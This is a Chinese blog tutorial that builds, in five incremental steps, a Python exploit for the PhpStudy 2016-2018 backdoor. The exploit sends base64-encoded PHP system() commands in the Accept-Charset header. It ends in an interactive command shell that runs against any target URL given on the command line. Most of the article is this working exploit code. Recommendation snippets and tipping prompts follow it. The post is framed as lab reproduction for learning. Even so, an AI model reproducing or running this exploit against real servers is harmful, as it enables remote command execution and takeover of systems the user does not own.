针对PhpStudy-RCE漏洞EXP的编写(python)

最新推荐文章于 2024-03-20 21:01:27 发布
最新推荐文章于 2024-03-20 21:01:27 发布
阅读量184 收藏
点赞数 1
文章标签: 安全 python vscode 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78155155/article/details/131872139
版权

PhpStudy-RCE漏洞

PhpStudy_2016-2018_RCE漏洞复现_L尘痕的博客-CSDN博客

首先先看到编写的收手点

基础环境

python编写工具:vscode

运行脚本:cmd窗口(管理员身份运行)

ECP编写

1、模拟数据包的发送

# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close

import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url)
# 获取到GET请求
print(res.text)
# 对上述内容做输出

 2、输出的内容不简洁,需要再次修改

import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出

 3、这时EXP所达到的效果得到初步的实现,只需将ipconfig编码改变就可以实现,为了更方便的使用,我们需要将编码变成cmd


import requests
# 定义request请求
import base64
# 导入base64模块

url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
cmd = "system('whoami');"
# 定义输入的命令
cmd = base64.b64encode(cmd.encode())
# 以二进制的方式进行编码
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : cmd,
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出

 4、直接在cmd窗口输入命令


import requests
# 定义request请求
import base64
# 导入base64模块

url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
while True :
# 让以下程序做循环
    cmd = input("-->")
    # 不用在脚本中修改命令,直接在窗口输入,得到结果
    if cmd == 'q!' :
    # 如果输入q!则终止循环
        break
    # 跳出循环
    cmd = f"system('{cmd}');"
    # 定义输入的命令
    cmd = base64.b64encode(cmd.encode())
    # 以二进制的方式进行编码
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }
    # 定义具体需要的关键字段

    res = requests.get(url = url, headers = headers)
    # 获取到GET请求
    result = res.text[0:res.text.find("<!DOCTYPE html")]
    # 对整体做切片,以内容的头部明显字段做目标来达到效果
    print(result)
    # 对上述内容做输出

 5、对脚本进行美化,得到最终EXP

# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close

import requests
# 定义request请求
import base64
# 导入base64模块
import sys
# 导入sys模块
banner = '''
---------------------------------------------------------------------
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|p|h|p|s|t|u|d|y|2|0|1|6|r|c|e|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Usage: python *.py http://192.168.153.232/phpinfo.php
---------------------------------------------------------------------
'''
# 美化脚本并提示脚本的用法,当然也可以写入作者
if len(sys.argv) < 2 :
# 如果没有给脚本并给的参数不小于2
    print(banner)
# 则输出提示
    exit()
# 否则退出,不执行以下程序

url = sys.argv[1]
# 定义针对的目标
def attack(cmd) :
    cmd = f"system('{cmd}');"
    # 定义输入的命令
    cmd = base64.b64encode(cmd.encode())
    # 以二进制的方式进行编码
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }
    # 定义具体需要的关键字段

    res = requests.get(url = url, headers = headers)
    # 获取到GET请求
    result = res.content.decode("gb2312")
    # 以二进制的方式解码在输出成中文
    result = result[0:result.find("<!DOCTYPE html")]
    # 对整体做切片,以内容的头部明显字段做目标来达到效果
    return result
    # 对上述内容做输出

while True :
# 让以下程序做循环
    cmd = input("请输入命令 : ")
    # 不用在脚本中修改命令,直接在窗口输入,得到结果
    result = attack(cmd)
    # 返回result内容
    print(result)
    # 输出result内容
    if cmd == 'q!' :
    # 如果输入q!则终止循环
        break
    # 则跳出循环

 有问题可以随时进行探讨哦!!!

#认真走好每一小步  请多指教

@L尘痕

L尘痕
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
weixin_43263566的博客
05-23 1056
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
Python安全编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1478
本例中以靶机DVWA中的盲注为例。
使用Burp Suite和Python进行自动化漏洞挖掘
鹅子鱼的博客:很菜但是很好学的小菜鸟
05-05 1991
最近一直在研究如何解放双手(好歹咱也做过两年程序员) 进行自动化挖掘(虽然目前能力还欠缺)简单的解放一下双手还是可以的 下面将利用Burp和python来实现自动化
Python小练习】使用Python编写POC 脚本-上篇
慢就是快
09-13 516
Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为**漏洞验证程序,**类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
Python安全脚本RCE反弹shell
weixin_60830484的博客
03-20 433
本次基于DVWA靶场进行的一次针对简单RCE漏洞反弹shell脚本编写
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本
01-22
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本" 涉及到的是一个针对PHPStudy软件的安全问题,即PHPStudy后门利用。PHPStudy是一款集成环境的工具,广泛用于PHP开发者的本地开发环境搭建。然而,如同任何其他...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip
01-22
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip" 提示我们关注的是一个与PHPStudy相关的安全问题,具体来说是一个后门利用脚本PHPStudy是一款广泛使用的PHP开发环境集成软件,它包括PHP、Apache、MySQL等...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 (4)
02-23
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 .zip
01-22
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 .zip】是一个关于网络安全和PHP开发的专题,其中涉及到PHPStudy这个流行的PHP开发环境以及它可能存在的安全问题。PHPStudy是一个集成了Apache、Nginx、PHP、MySQL等...
phpStudy-64
最新发布
06-21
phpStudy-64】是一款针对Windows平台设计的PHP开发集成环境,专为方便开发者进行PHP编程和服务器管理而打造。它集成了多种常见的Web开发组件,如PHP、Apache、MySQL等,使得开发者无需手动配置复杂的环境,即可...
Python-通过Redis和CSRF获取RCE的一个示例
08-10
通过Redis和CSRF获取RCE的一个示例
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
记一次曲折的RCE挖掘过程
一个安全研究员
09-10 1443
????
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4394
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE远程代码命令执行
weixin_61675401的博客
05-10 184
代码执行漏洞 命令执行漏洞 利用思路 找函数,找完函数找参数 实例 命令执行漏洞的绕过 可以借助ceye
网络安全笔记 -- RCE代码及命令执行漏洞
swy66的博客
09-11 1594
RCE代码及命令执行漏洞
python代码扫描工具_Python脚本实现Web漏洞扫描工具
weixin_39593354的博客
12-04 1483
这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修...
RCE代码及命令执行漏洞
m0_51468027的博客
02-13 7003
  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 一、代码执行 1、脚本 (1)PHP   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如 eval()、assert()、preg_replace()、create_function
【工具】低版本向日葵RCE漏洞工具编写_Python
crowsec
02-27 3030
在昨天发的文章里面,看到了t00ls上TRY写的工具(因为当时不确定文章能不能发,所以我就没放链接,在这里和师傅说声抱歉),但是貌似还没有python的版本,加上晚间又看到有师傅发了全文分析的pdf文件,所以在这里在前辈的基础上分析下这个RCE怎么写,怎么用python实现它。
PHPstudy-pro 启动服务80端口被占用
05-09
2. 修改PHPstudy-pro的默认端口号:您可以在PHPstudy-pro的设置中修改默认端口号,例如改成8080等其他未被占用的端口号。 3. 卸载占用80端口的程序:如果80端口被其他程序占用,您可以尝试卸载或禁用这些程序,或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

L尘痕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值